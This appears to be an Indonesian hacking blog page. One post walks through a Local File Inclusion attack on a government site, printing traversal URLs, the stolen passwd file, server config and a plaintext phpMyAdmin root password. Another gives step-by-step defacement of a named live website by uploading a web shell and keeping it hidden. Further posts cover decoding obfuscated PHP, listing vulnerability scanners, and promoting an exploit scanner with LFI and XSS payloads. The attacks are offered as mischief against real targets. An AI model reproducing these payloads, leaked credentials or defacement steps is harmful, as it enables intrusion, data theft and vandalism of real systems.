\

Featured

Powered by Blogger.

Browsing "Older Posts"

hai kembali lagi bersama saya cyberbaghost si raja tega hahaha :D Saya akan mempergunakan bug sederhana pada situs .gov, Local File Inclusion,
kalo saya bilang mungkin eksekusinya paling hanya beberapa menit saja :D Tapi
sekali lagi yang saya titik beratkan disini adalah pola berfikir kritisnya :)

Waktu itu saya sedang browsing mencari satu artikel pada salah satu situs
pemerintah www.somename.go.id nah artikel yang saya cari ternyata bisa
didownload berbentuk pdf di url ini

- http://www.somename.go.id/portalbaru/portal/konten.php?nama=Buku&op=index_buku&mn=6&smn=f

disitu saya liat url untuk mendownloadnya adalah

- http://www.somename.go.id/portalbaru/portal/konten.php?nama=Buku&op=dl_buku&namafile=WDR_2008_eng_web.pdf

Pemikiran iseng mulai muncul, bagaimana jika namafile=WDR_2008_eng_web.pdf saya
ganti menjadi sesuatu.

- http://www.somename.go.id/portalbaru/portal/konten.php?nama=Buku&op=dl_buku&namafile=blablu.pdf

nah WDR_2008_eng_web.pdf saya ubah menjadi blablu.pdf, ternyata aplikasi web
tadi memperbolehkan saya untuk mendownload blablu.pdf seolah2 file tersebut
ada, lalu saya ingin mencoba memasukkan path system

- http://www.somename.go.id/portalbaru/portal/konten.php?nama=Buku&op=dl_buku&namafile=../../../etc/passwd

ternyata dia mendownload file juga, tapi isinya kosong, saya asumsikan bahwa
aplikasi diberikan permission yang cukup tinggi untuk mengakses file2 sensitif
pada server, saya trial and error aja jika begitu, sehingga mencapai url

- http://www.somename.go.id/portalbaru/portal/konten.php?nama=Buku&op=dl_buku&namafile=../../../../../../../../../../../etc/passwd

nah disini akhirnya file passwd terdownload dengan sempurna

root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
aman:*:1001:1001:User &:/home/aman:/bin/sh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin

ya sudah, sampe di sini saya tidak akan memberikan URL lanjutannya, saya hanya
akan memberikan pola berpikir iseng saya

- step berikutnya saya berfikir, saya harus mencari dimana letak file2 sensitif
yang bermanfaat tentunya, karena posisi saya sedang berada di satu warnet
(anggaplah begitu) yang tidak memungkinkan saya menjalankan tools, scanner,
atau apalah yang semacamnya

- yang saya fikir pertama tentunya dimana letak konfigurasi webserver
- saya harus mengetahui versi dari web server, daemon web server, serta
operating sistem yang digunakan
- banyak situs di web yang bisa digunakan untuk mencari informasi ini, saya
dapatkan informasi bahwa OS nya adalah FreeBSD dengan Apache 2.2 sebagai
webserver
- Lalu saya googling dengen k/w "httpd.conf in freebsd apache 2.2" muncullah
hasil /usr/local/etc/apache22/httpd.conf
- Kemudian saya download httpd.conf dengan menggunakan metoda di atas, muncul
hasil file configurasi, disana saya garis bawahi ada satu baris informasi penting

# Virtual hosts
Include etc/apache22/extra/httpd-vhosts.conf

- Saya lanjutkan pencarian ke /usr/local/etc/apache22/extra/httpd-vhosts.conf

pada file tersebut saya melihat ada baris

<VirtualHost 192.xxx.1.xxx:80>
# <VirtualHost 222.xxx.11.xxx:80>
ServerAdmin amanbudi@somename.go.id
# DocumentRoot "/usr/local/www/apache22/data/web-somename__upload@07032009/portal"
DocumentRoot "/usr/local/www/apache22/data/portal2"
ServerName www.somename.go.id

Alias /db4dm1n /usr/local/www/apache22/phpMyAdmin
<Directory /usr/local/www/apache22/phpMyAdmin>
AllowOverride All
</Directory>

- nah berarti disitulah letak phpmyadminnya, beserta url untuk mengaksesnya
lalu bagaimana dengan login dan passwordnya? Phpmyadmin bukanlah suatu
aplikasi yang aneh, sebagian besar orang rata2 pernah menggunakannya secara
umum settingan default konfigurasi ada di /phpmyadmin direktori/config.inc.php

- Lalu saya lanjutkan ke /usr/local/www/apache22/phpMyAdmin/config.inc.php

dalam file tersebut ada informasi
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'sf7100sy';

- voila, anda dapat masuk ke dalam mysqladmin, menyelipkan script jahat untuk
mendapatkan full akses dari server tersebut
Tags:

Bug Local File Inclusion .go.id

By admin → Monday, April 1, 2013
dork : allinurl:media.php?module=berita
contohnya ini http://dahliatamacargo.com/
1. cari halaman login untuk admin nya , kebetulan web di atas tmpat admin nya cuma ditambahkan /admin sajah menjadi http://dahliatamacargo.com/admin/
2. setelah dapat kita tambahkan urlnya berubah menjadi http://dahliatamacargo.com/admin/content.php?module=banner
3. ketika terlihat halaman yang bisa untuk TAMBAH BANNER klik kemudian isikan dengan web shell agan semua , web shell nya nyari sendiri ajah banyak bertebaran di google .
4. setelah seb shell sudah terpasang kita lihat web shell kita bisa berfungsi atau tidak . http://dahliatamacargo.com/admin/foto_berita/yhonezcyber4rt.php
5. kalau berhasil terbuka berarti kita tinggal masuk dalam web shell kita dan jangan lupa pindahkan web shell nya ke folder web yang cukup aman biar web shell kita awet dan langgeng tertanam di website tersebut.
6. tinggal ganti index.php nya ajah deh kalau mau tega – tegaan mah :D (sengaja pakek web indo kalau ada yang tega berarti terlalu :D )
Tags:

deface menggunakan bug lokomedia

By admin →
Cara men-decode file php yang diencrypt gzinflate base 64 adalah sebagai berikut.
Pertama buka file tersebut dengan text editor, misalnya notepad atau program lain yang anda sukai.
Disini saya contohkan file terencrypt.php yang berisi script yang terenkripsi seperti berikut:
<?php
eval(gzinflate(base64_decode(‘
5Txrc9u2sp9PZ/ofEB3fWkodSUmb3t74kXH8SDwn

Vu2qC75rpwx7kcPcXauU+x97eVz52FUOonR44PHz
g73n/wc=
‘)));
?>
Didalam file tersebut terlihat script yang terenkripsi yang diawali dengan “eval(gzinflate(base64_decode(” yang baris berikutnya, yang saya tebalkan tidak terbaca lagi.
Selanjutnya buat sebuah file php, misalnya decode.php yang akan men-decode enkripsi dari file tersebut, seperti contoh berikut:
<?php
echo gzinflate(base64_decode(‘
5Txrc9u2sp9PZ/ofEB3fWkodSUmb3t74kXH8SDwn

Vu2qC75rpwx7kcPcXauU+x97eVz52FUOonR44PHz
g73n/wc=
‘));
?>
Perhatikan karakter yang terenkripsi saya cetak tebal. Yang perlu anda ambil dari file yang terenkripsi adalah hanya bagian yang terenkripsi saja, lalu anda masukkan ke file decode.php seperti contoh diatas.
Setelah itu execute/jalankan file tersebut pada php server, buka dengan browser.
Setelah terbuka anda bisa melihat source filenya (yang terlihat dibrowser bukan source asli, tetapi versi htmlnya). Jika menggunakan IE, kilk View -Source. Atau jika menggunakan Firefox, klik View – Page Source. Maka yang terlihat pada source browser tersebut adalah isi file php yang sudah diencode.
Tags:

Decode file PHP ‘eval(gzinflate(base64_decode(‘’

By admin →
 Oke lama tak jumpa saya share tool untuk menguki keamanan web langsung baca kemudian download oke :D


1. Acunetix Web Vulnerability Scanner (Free Edition) v 7.0.
Pada edisi free, secara tampilan dan fungsionalitas, software ini memberikan kemudahan bagi pengguna. Disediakan pula wizard yang akan membantu Anda dalam menetapkan parameter pengujian. Hasil yang disajikan dapat dibaca secara mudah dan dapat dieksport ke format dokumen. Software ini pula akan menunjukkan celah keamanan berikut solusi yang dapat digunakan untuk menambal celah keamanan tersebut. Di versi berbayarnya, fasilitas scanner tentunya lebih lengkap. Pada keadaan standart, software ini akan melakukan scanning pada: aplikasi, jaringan (sistem operasi), port yang terbuka. Informasi yang ditemukan dikelompokkan menjadi: high, medium, low, informational. Profile yang dapat dipilih saat melakukan testing juga beragam, mulai dari XSS, blind sql injection, sql injection, weak password, dsb. Overall, software ini layak dipertimbangkan untuk pengujian celah keamanan aplikasi web kita.

2. N-Stalker Web Application Security Scanner 2012 (Free Edition)
Pada edisi free, secara tampilan dan fungsionalitas, software ini memberikan kemudahan bagi pengguna. Disediakan pula wizard yang akan membantu Anda dalam menetapkan parameter pengujian. Toolbar/Ribbon yang disajikan mirip dengan Microsoft Office. Hasil scan yang disajikan dapat dibaca secara mudah dan dapat dieksport ke format dokumen. Software ini pula akan menunjukkan celah keamanan berikut solusi yang dapat digunakan untuk menambal celah keamanan tersebut. Beberapa option yang dapat digunakan seperti: Web Proxy, HTTP Brute Force, Web Discovery, Encoder Tool, HTTP Load Tester. Namun sebagai catatan: software ini membutuhkan koneksi internet pertama kali saat akan digunakan untuk mengupdate database untuk keperluan scanning.

3. Wikto – Web Server Vulnerability Scanner
Untuk versi yang lebih “ringan”, kita dapat menggunakan Wikto yang merupakan turunan dari Nikto. Ada beberapa mode scanning yang dapat digunakan seperti: Spider, Googler, Back End, Wikto, Google Hack. Selain itu juga disediakan Wizard untuk memudahkan kita menetapkan parameter scanning. Namun dari sisi reporting, nampaknya hasil yang disajikan kurang user friendly.

Referensi tambahan mengenai tools yang dapat digunakan untuk menguji keamanan aplikasi web dapat Anda temukan di:
- Web Site Security Test Tools
- Top 10 Web Vulnerability Scanners

Untuk anda yang ingin menguji keamanan Web anda silahkan Uji sekarang juga :D
Tags:

Menguji Keamanan Web (Aplikasi)

By admin →



















ini yg suka saya pake.. :D tools dari XCode.. walaupun saya bukan anak XCode tapi saya bangga dengan karya mereka :D Yang tentunya karya-kaya anak dalam negri harus di apresiasi betul ??? tool ini bagus untuk mencari web yang vuln ...
langsung aja sedoot...
Download XCode Exploits Scanner [re-patch September 2011]

PENGGUNAAN
Setelah download, ekstrak semua filenya dan jalankan XCodeXploitScanner.exe, Klik Dork It dan Tool ini akan mengumpulkan Link dari Dork yang anda masukkan kemudian menampilkan listnya. setelah selesai menampilkan List, Anda akan bisa melakukan scanning kerentanan SQL injection/Local File Inclusion/Cross Site Scripting pada web yang ada di list. Tool ini akan mengirimkan parameter injeksi ke web seperti ‘ – * /../../../../../../../../../../../../../../etc/passwd , “>alert(“XSS DETECTED XCode Exploit Scanner”) . Jika Web tersebut memiliki bug maka di status akan muncul : www.target.com?blabla.php?=1234 : SQLi Vulnerable.
www.target.com?blabla.php?=1234/../../../../../../../../../../../../../../etc/passwd LFI Vulnerable
www.target.com?blabla.php?=1234″>alert(“XXS DETECTED XCode Exploit Scanner”) XSS Vulnerable
Pada status list yang terdeteksi, anda bisa klik Open Vuln Link with Browser untuk menampilkan web pada browser anda
Tool ini juga menambahkan webshell hunter, dimana anda bisa mencari web shell c99, r57, c100, ITsecteam_shell, b374k, yang telah diupload oleh hacker.
Jika pada daftar “Google results” tidak memunculkan hasil, coba beberapa trik dibawah ini:
[1] ganti search path dari “/cse?FORID:1&q=” ke “/search?q=
[2] klik “Show captcha” dan isi kode bypass tersebut.
[3] ganti domain google contoh: dari com to co.id , com.br, fr, co.th, com.ch dan lain sebagainya
Mungkin masih banyak kekurangan atau Bug yang belum diketahui oleh penulis. Tapi setidaknya tool ini bisa mempermudah anda untuk mencari target.
Semoga Berguna..
Tags:

XCode sql injection (wajib punya)

By admin →